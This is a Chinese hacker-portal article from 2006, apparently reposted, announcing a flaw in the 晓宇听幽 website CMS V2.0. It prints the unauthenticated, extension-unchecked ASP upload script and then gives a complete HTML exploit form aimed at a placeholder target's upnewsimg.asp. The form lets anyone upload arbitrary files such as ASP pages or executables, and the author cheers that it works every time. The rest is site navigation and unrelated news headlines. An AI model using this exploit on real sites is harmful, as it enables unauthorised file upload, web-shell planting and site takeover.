晓宇听幽网站内容管理系统 V2.0漏洞

资源交流吧：VIP

{$Wap}

您现在的位置：九佰度在线九佰度空间 >> 文章中心 >> 黑客前沿 >> 漏洞公告 >> 文章正文

用户登录

新用户注册

晓宇听幽网站内容管理系统 V2.0漏洞

★★★

【字体：小大】

晓宇听幽网站内容管理系统 V2.0漏洞

作者：未知文章来源：来自网络点击数：更新时间：2006-2-11

0
(作者给我们留下后门?)
晓宇听幽网站内容管理系统:
目前最强大整站系统：包含一般网站所必须的模块如新闻文章、下载、影视、图片、音乐等各模块相互独立又紧密联系，无限分级，自由调用，支持模板，前台全部生成html，最大程度节省系统资源，大中型门户网站的最佳选择

内容页面是生成html,比较安全,后台地方看了一下,好像也问题不大.
但是转到upload目录,发现两个文件
uploadset.asp upNewsIMg.asp
其中uploadset.asp中做了验证,而upNewsImg.asp中没有任何限制,我们来看一下源代码:

CODE:

<link rel="stylesheet" type="text/css" href="../admin/admin.css">
<script language="JavaScript">

</script>

<% server.scripttimeout=1900 %>
<%
UpFilePath="NewsIMG/"
fileweb="UPLOAD/"
nameset =1
pathset =0
dim i
i=1
%>
<%
function makefilename(fname)
fname = now()
fname = replace(fname,"-","")
fname = replace(fname," ","")
fname = replace(fname,":","")
makefilename=fname
end function
%>

<%
dim upload,file,formName,iCount
dim url,url1
set upload=new upload_5xSoft ’’建立上传对象

iCount=0
for each formName in upload.file ’’列出所有上传了的文件
set file=upload.file(formName) ’’生成一个文件对象
if file.FileSize>0 then       ’’如果 FileSize > 0 说明有文件数据
fname = makefilename(now()) & iCount & "." & GetExtendName(file.FileName)
file.SaveAs Server.mappath(UpFilePath&fname)   ’’保存文件
iCount=iCount+1
response.write"图片"&i&" <input type=""text"" name="""&i&""" size=""55"" style=""border-style: solid; border-width: 1"" value=""../"&fileweb&UpFilePath&fname&"""><br>[ <a href=# onclick=""Addpic(’../"&fileweb&UpFilePath&fname&"’)"">点击这里把图片"&i&"添加到编辑器中</a> ]<br>"
i=i+1
set file=nothing
end if
next
set upload=nothing ’’删除此对象

function GetExtendName(FileName)
dim ExtName
ExtName = LCase(FileName)
ExtName = right(ExtName,3)
ExtName = right(ExtName,3-Instr(ExtName,"."))
GetExtendName = ExtName
end function
%>

[Copy to clipboard]

哈哈,完全可以自己购造一个上传页面,直接上传,连exe文件都可以,别说asp什么的啦.
而且上传完就有地址,简直就是作者给我们留的一个后门.
利用文件:

CODE:

<html>
<head>
<title>文件上传</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#D6EF7E" text="#000000">
<form name="form1" method="post" action="[url]http://www.target.com/upload/upnewsimg.asp[/url]" enctype="multipart/form-data">
<input type="hidden" name="act" value="upload">
<div align="center">
  <center>
  <table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">
    <tr>
    <th height="16" align="left" valign="middle">
    <div align="center">
      <b>图片上传</b>
    </div>
    </th>
    </tr>
    <tr align="left" valign="middle" bgcolor="#eeeeee">
    <td bgcolor="#FFFFFF" height="1" valign="top">
<input type="file" name="file1" style="width:200" class="tx1">


    </td>
    </tr>
    <tr align="center" valign="middle">
    <td align="left" id="upid" height="5" bgcolor="#FFFFFF">
    </td>
    </tr>
    <tr align="center" valign="middle" bgcolor="#eeeeee">
    <td bgcolor="#FFFFFF" height="28">
    <input type="submit" name="Submit" value="· 提交 ·" class="bt">
    <input type="reset" name="Submit2" value="· 重执 ·" class="bt"></td>
    </tr>
    <tr align="center" valign="middle" bgcolor="#eeeeee">
    <td height="14" bgcolor="#FFFFFF">　</td>
    </tr>
  </table>
  </center>
</div>
</form>

</body>

</html>

[Copy to clipboard]

百发百中,哈哈.好玩.
我的Blog     http://hhuai.cn

[1]

文章录入：qq007 责任编辑：qq007

上一篇文章： phpwind v4.0.1直正最新的跨站与挂马漏洞

下一篇文章：江民公布2005年微软操作系统十大漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　本类热门文章

	泰航空姐在曼谷新国际机场屡	11-22
	俄罗斯最后一颗军事间谍卫星	11-22
	英国成为欧洲最大性奴交易市	11-22
	朝鲜称将坚决报复日本对其实	11-22
	中情局被指谋杀肯尼迪兄弟	11-22
	布什访问印尼引起大规模抗议	11-22
	东南亚许多儿童成为卖淫活动	11-22
	英国妇女两次怀上三胞胎医学	11-22

　最新推荐文章

	泰航空姐在曼谷新国际机场屡	11-22
	俄罗斯最后一颗军事间谍卫星	11-22
	英国成为欧洲最大性奴交易市	11-22
	朝鲜称将坚决报复日本对其实	11-22
	中情局被指谋杀肯尼迪兄弟	11-22
	布什访问印尼引起大规模抗议	11-22
	东南亚许多儿童成为卖淫活动	11-22
	英国妇女两次怀上三胞胎医学	11-22

　最新文章

	泰航空姐在曼谷新国际机场屡	11-22
	俄罗斯最后一颗军事间谍卫星	11-22
	英国成为欧洲最大性奴交易市	11-22
	朝鲜称将坚决报复日本对其实	11-22
	中情局被指谋杀肯尼迪兄弟	11-22
	布什访问印尼引起大规模抗议	11-22
	东南亚许多儿童成为卖淫活动	11-22
	英国妇女两次怀上三胞胎医学	11-22

　文章评论（评论内容只代表网友观点，与本站立场无关！）【发表评论】